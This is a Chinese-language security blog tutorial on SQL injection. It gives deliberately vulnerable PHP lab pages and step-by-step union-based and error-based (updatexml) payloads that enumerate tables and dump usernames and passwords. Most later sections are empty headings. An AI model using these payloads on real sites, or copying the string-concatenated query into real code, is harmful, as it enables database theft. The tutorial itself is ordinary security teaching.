<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="http://example.com/2023/05/12/Web%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="HVVL404">
<meta property="og:description" content="SQL注入">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/Web%E6%BC%8F%E6%B4%9E/SQL-1.png">
<meta property="article:published_time" content="2023-05-12T12:24:50.319Z">
<meta property="article:modified_time" content="2023-05-17T08:28:27.326Z">
<meta property="article:author" content="HVVL404">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/Web%E6%BC%8F%E6%B4%9E/SQL-1.png">

<link rel="canonical" href="http://example.com/2023/05/12/Web%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SQL注入 | HVVL404</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">HVVL404</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="house fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="categories fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/12/Web%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="HVVL404">
      <meta itemprop="description" content="欢迎来到我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HVVL404">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-05-12 20:24:50" itemprop="dateCreated datePublished" datetime="2023-05-12T20:24:50+08:00">2023-05-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-05-17 16:28:27" itemprop="dateModified" datetime="2023-05-17T16:28:27+08:00">2023-05-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">Web漏洞</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>SQL注入</p>
<span id="more"></span>

<p>什么是 SQL 注入？</p>
<p><strong>SQL注入（SQL Injectioin）</strong>漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中，前端的数据传入后端时，没有作严格的验证过滤导致传入的“数据”拼接到了 SQL 语句中。被数据库当作 SQL 语句的一部分执行，从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。</p>
<p>注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件：</p>
<p>1、用户能够控制数据输入</p>
<p>2、原本程序要执行的代码，拼接了用户输入的数据。</p>
<p>对SQL注入漏洞的挖掘虽然多数时候以工具为主，手工为辅助，但切忌上来就一把梭。</p>
<p>数据库自行配置</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">数据库名：learn</span><br><span class="line">表名：user</span><br><span class="line">列名：id，username，password</span><br><span class="line"><span class="comment">// 可以自行加一个 flag。</span></span><br></pre></td></tr></table></figure>

<br>

<h4 id="一、SQL-联合注入"><a href="#一、SQL-联合注入" class="headerlink" title="一、SQL 联合注入"></a>一、SQL 联合注入</h4><p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;SQL常规回显注入环境&quot;</span>.<span class="string">&quot;&lt;hr&gt;&quot;</span>;</span><br><span class="line"><span class="comment">// 连接mysql</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="title function_ invoke__">mysqli_connect</span>(<span class="string">&#x27;localhost&#x27;</span>, <span class="string">&#x27;root&#x27;</span>, <span class="string">&#x27;&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//判断连接是否成功</span></span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$conn</span>)&#123;</span><br><span class="line">   <span class="keyword">die</span> (<span class="string">&quot;连接MySQL发生错误:&quot;</span> . <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$conn</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 选择库 test</span></span><br><span class="line"><span class="title function_ invoke__">mysqli_select_db</span>(<span class="variable">$conn</span>, <span class="string">&#x27;learn&#x27;</span>) <span class="keyword">or</span> <span class="keyword">die</span> (<span class="string">&quot;无法正确连接到数据库！&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//取消报错显示</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 接收参数id</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"><span class="comment">// 执行sql语句并返回结果</span></span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM user WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;</span><br><span class="line">    <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$sql</span>);</span><br><span class="line">    <span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_array</span>(<span class="variable">$result</span>, MYSQLI_BOTH);</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$row</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;Your username：&#x27;</span>. <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>] . <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;Your password：&#x27;</span> .<span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>] . <span class="string">&#x27;&lt;hr&gt;&#x27;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$conn</span>) . <span class="string">&quot;&lt;hr&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123; <span class="keyword">echo</span> <span class="string">&quot;Please input the ID as parameter with numeric value&quot;</span> . <span class="string">&quot;&lt;hr&gt;&quot;</span>;&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;执行的SQL语句：&#x27;</span>. <span class="variable">$sql</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>SQL 联合注入，顾名思义也就是用语句 union 来联合查询，所以联合注入也是最基础的查询注入。</p>
<h5 id="1、数字型"><a href="#1、数字型" class="headerlink" title="1、数字型"></a>1、数字型</h5><p>数字型就是输入的数据是数字，不是字符串。这里查询结果返回，我们可以去看看后台的 SQL 语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id</span><br></pre></td></tr></table></figure>

<p>这个 SQL 语句代码直接就是去数据库中查找 id 这个值的全部信息。那么我们如果在输入的信息后拼接上我们要执行的恶意语句会怎么样呢？比如我们要查询 password 这个字段，我们知道，页面是返回不了 password 这个字段的，但是我们去构造语句拼接可以实现：</p>
<p><strong>SQL 注入的一般步骤：</strong></p>
<p>（1）首先查列。我们需要知道该表有多少列才能执行语句，语句 order by 是查列，后面的数字是该表的列数，如果不知道多少列就需要一个一个试，直到页面不再报错为止：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id order by 3</span><br></pre></td></tr></table></figure>

<p>（2）接下来是联合查询。也就是要用到 union 语句，在第一步的时候知道了该表的列数，那么利用 <code>union select 1,2,3</code> 返回的结果显示在页面上，<code>1，2，3</code> 是为了更清楚的知道显示的位置：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id union select 1,2,3</span><br></pre></td></tr></table></figure>

<p>（3）接下来是查库。查看当前的数据库名称，<code>database() </code>不是说想放在就放在哪，需要放在能显示在页面的列上，例如列 1 和列 2 ：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id union select 1,(database()),3</span><br></pre></td></tr></table></figure>

<p>（4）接下来比较长了这个语句，查表。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">group_concat()			<span class="comment">#这个函数是拼接的作用</span></span><br><span class="line">information_schema		<span class="comment">#这是一个数据库，存放表名的数据库</span></span><br><span class="line">tables					<span class="comment">#这是上面那个数据库的表</span></span><br><span class="line">table_schema			<span class="comment">#这个表示当前表的数据库名</span></span><br></pre></td></tr></table></figure>

<p>执行下面语句可以查出当前数据库的表名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#x27;learn&#x27;;</span><br></pre></td></tr></table></figure>

<p>（5）查字段名。跟查表差不多就是改了几个地方，把 tables 改为 columns ，还有把 <code>table_name</code> 改为 <code>column_name</code>，后面还要加一个 <code>table_name=user</code> 这个条件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#x27;learn&#x27; and table_name=&#x27;user&#x27;;</span><br></pre></td></tr></table></figure>

<p>（6）最后一步，查数据。上一步中我们知道了列名，也就是字段名。我们就可以利用字段名来查看当前字段所有的数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=$id union select 1,group_concat(id,username,password),3 from learn.user;</span><br></pre></td></tr></table></figure>

<p>相比于上面的语句，最后的语句就少了很多，因为只需要后面的 <code>learn.user</code> 这个东西就可以定位了。</p>
<h5 id="2、字符型"><a href="#2、字符型" class="headerlink" title="2、字符型"></a>2、字符型</h5><p>那么字符型呢，跟数字型没什么区别，步骤都一样（没 waf 的情况下），只是利用方式不一样。原理也是利用的拼接。</p>
<p>对于字符型的 SQL 注入，我们可以传一个单引号看看会怎么样？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">login.php?id=1&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Web%E6%BC%8F%E6%B4%9E/SQL-1.png" alt="SQL-1"></p>
<p>可以看到会报错，那么为什么会这样，上面我们知道了数字型的 SQL 注入是因为拼接导致，那么字符型应该也是因为拼接导致的。后台的 SQL 语句是这样的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=&#x27;1&#x27; LIMIT 0,1</span><br></pre></td></tr></table></figure>

<p>而我们传入的数据是 <code>1&#39;</code> 所以就成了这样：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=&#x27;1&#x27;&#x27; LIMIT 0,1</span><br></pre></td></tr></table></figure>

<p>因为分号跟后面的分号拼接，导致无法执行后面的语句，所以报错，那么我们如果去除后面的分号，是不是就可以构造 SQL 语句了。在 MySQL 中注释是 <code>#，--+，-- -</code> 这三个，可以利用注释，注释掉后面的语句就达到我们想要的目的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM user WHERE id=&#x27;1&#x27;#&#x27; LIMIT 0,1</span><br><span class="line">SELECT * FROM user WHERE id=&#x27;1&#x27;--+&#x27; LIMIT 0,1</span><br><span class="line">SELECT * FROM user WHERE id=&#x27;1&#x27;-- -&#x27; LIMIT 0,1</span><br></pre></td></tr></table></figure>

<p>那么这样我们刷新页面，发现没有报错并且正常的显示，接下来的步骤就跟数字型的一样了，就是在数字型的基础上多了分号和注释而已，请读者自行尝试。这里就不赘述。</p>
<br>

<h4 id="二、报错注入"><a href="#二、报错注入" class="headerlink" title="二、报错注入"></a>二、报错注入</h4><p>报错注入，顾名思义就是通过数据反馈出的错误信息提示进行注入攻击。通常情况下我们首先需要输入单引号判断是否存在报错，然后进一步找出注入点。</p>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;SQL报错注入环境&quot;</span>.<span class="string">&quot;&lt;hr&gt;&quot;</span>;</span><br><span class="line"><span class="comment">// 连接mysql</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="title function_ invoke__">mysqli_connect</span>(<span class="string">&#x27;localhost&#x27;</span>, <span class="string">&#x27;root&#x27;</span>, <span class="string">&#x27;&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//判断连接是否成功</span></span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$conn</span>)&#123;</span><br><span class="line">   <span class="keyword">die</span> (<span class="string">&quot;连接MySQL发生错误:&quot;</span> . <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$conn</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 选择库 test</span></span><br><span class="line"><span class="title function_ invoke__">mysqli_select_db</span>(<span class="variable">$conn</span>, <span class="string">&#x27;learn&#x27;</span>) <span class="keyword">or</span> <span class="keyword">die</span> (<span class="string">&quot;无法正确连接到数据库！&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//取消报错显示</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 接收参数id</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"><span class="comment">// 执行sql语句并返回结果</span></span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM user WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;</span><br><span class="line">    <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$sql</span>);</span><br><span class="line">    <span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_array</span>(<span class="variable">$result</span>, MYSQLI_BOTH);</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$row</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;You are in ...&lt;hr&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$conn</span>) . <span class="string">&quot;&lt;hr&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123; <span class="keyword">echo</span> <span class="string">&quot;Please input the ID as parameter with numeric value&quot;</span> . <span class="string">&quot;&lt;hr&gt;&quot;</span>;&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;执行的SQL语句：&#x27;</span>. <span class="variable">$sql</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>SQL 报错注入的步骤：</strong></p>
<p>1、因为这里是报错注入，他需要涉及到特殊的函数使他回显出来，下面介绍几个常见的报错注入的函数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1、Updatexml</span><br><span class="line">2、ExtractValue</span><br><span class="line">3、Floor</span><br><span class="line">4、exp</span><br><span class="line">5、join</span><br></pre></td></tr></table></figure>

<p>可以看到上面的代码是没有回显，可以在页面进行测试，确实是没有回显，只会显示文字：<code>You are in ...</code> 。那么在这种没有回显的情况我们无法用联合注入，联合注入是需要显示在页面上的，那么没有回显是有两个方法，一个就是现在要讲的报错注入，另一个就是盲注，在下面会讲到。首先我们先来看看语句吧，拿较为常用的函数——<code>updatexml</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?id=1&#x27; and updatexml(1,concat(0x7e,(select database()),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p>可以看到 updatexml 这个函数的语法就是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">updatexml(1,concat(1,(需要执行的语句),1),1)</span><br><span class="line">// 1 的地方随便放，里面那个括号的 1 可以放 0x7e，也就是 ~，为了看得更清楚</span><br></pre></td></tr></table></figure>

<p>其实 extractValue 这个函数的用法跟他一样：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">extractValue(1,concat(1,(需要执行的语句),1),1)</span><br></pre></td></tr></table></figure>

<p>2、接下就跟联合注入一样，查表，查列，查数据。</p>
<p>这里演示一下查表的语句，接下来的步骤请读者自行完成。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;learn&#x27;),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p>3、做完 SQL 注入的基本步骤，接下来介绍几个需要知道的函数，因为在最后一步查看数据的时候，报错注入经常会有一个问题，那就是数据不全，这是因为那条语句只会显示部分数据，所以认识几个函数可以显示更多的数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">substr()	#substr(字段名，起始的位置，步长)			从起始位置开始</span><br><span class="line">mid()		#mid(字段名，起始的位置，步长)			从起始位置开始</span><br><span class="line">left()		#left(字段名，长度)				从最左边开始	</span><br><span class="line">right()		#right(字段名，长度)				从最后边开始</span><br></pre></td></tr></table></figure>

<p>有了上面的函数在最后查数据就可以查到比较完整的数据了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?id=1&#x27; and updatexml(1,concat(0x7e,substr((select group_concat(password) from learn.user),1,1),0x7e),1)#</span><br></pre></td></tr></table></figure>

<br>

<h4 id="三、盲注"><a href="#三、盲注" class="headerlink" title="三、盲注"></a>三、盲注</h4><h5 id="1、布尔盲注"><a href="#1、布尔盲注" class="headerlink" title="1、布尔盲注"></a>1、布尔盲注</h5><h5 id="2、时间盲注"><a href="#2、时间盲注" class="headerlink" title="2、时间盲注"></a>2、时间盲注</h5><br>

<h4 id="四、更新注入"><a href="#四、更新注入" class="headerlink" title="四、更新注入"></a>四、更新注入</h4><br>

<h4 id="五、堆叠注入"><a href="#五、堆叠注入" class="headerlink" title="五、堆叠注入"></a>五、堆叠注入</h4><br>

<h4 id="六、二次注入"><a href="#六、二次注入" class="headerlink" title="六、二次注入"></a>六、二次注入</h4><br>

<h4 id="七、宽字节注入"><a href="#七、宽字节注入" class="headerlink" title="七、宽字节注入"></a>七、宽字节注入</h4><br>

<h4 id="八、URL-双解码注入"><a href="#八、URL-双解码注入" class="headerlink" title="八、URL 双解码注入"></a>八、URL 双解码注入</h4><br>

<h4 id="九、HTTP-头注入"><a href="#九、HTTP-头注入" class="headerlink" title="九、HTTP 头注入"></a>九、HTTP 头注入</h4><br>

<h4 id="十、SQLMap-的使用"><a href="#十、SQLMap-的使用" class="headerlink" title="十、SQLMap 的使用"></a>十、SQLMap 的使用</h4><br>

<h4 id="十一、绕-WAF"><a href="#十一、绕-WAF" class="headerlink" title="十一、绕 WAF"></a>十一、绕 WAF</h4>
    </div>

    
    
    
	
        <div class="reward-container">
  <div>原创技术分享，您的支持将鼓励我继续创作</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="HVVL404 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="HVVL404 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>HVVL404
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2023/05/12/Web%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入">http://example.com/2023/05/12/Web漏洞/SQL注入/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/05/08/Web%E6%BC%8F%E6%B4%9E/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="PHP反序列化">
      <i class="fa fa-chevron-left"></i> PHP反序列化
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/05/12/Web%E6%BC%8F%E6%B4%9E/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
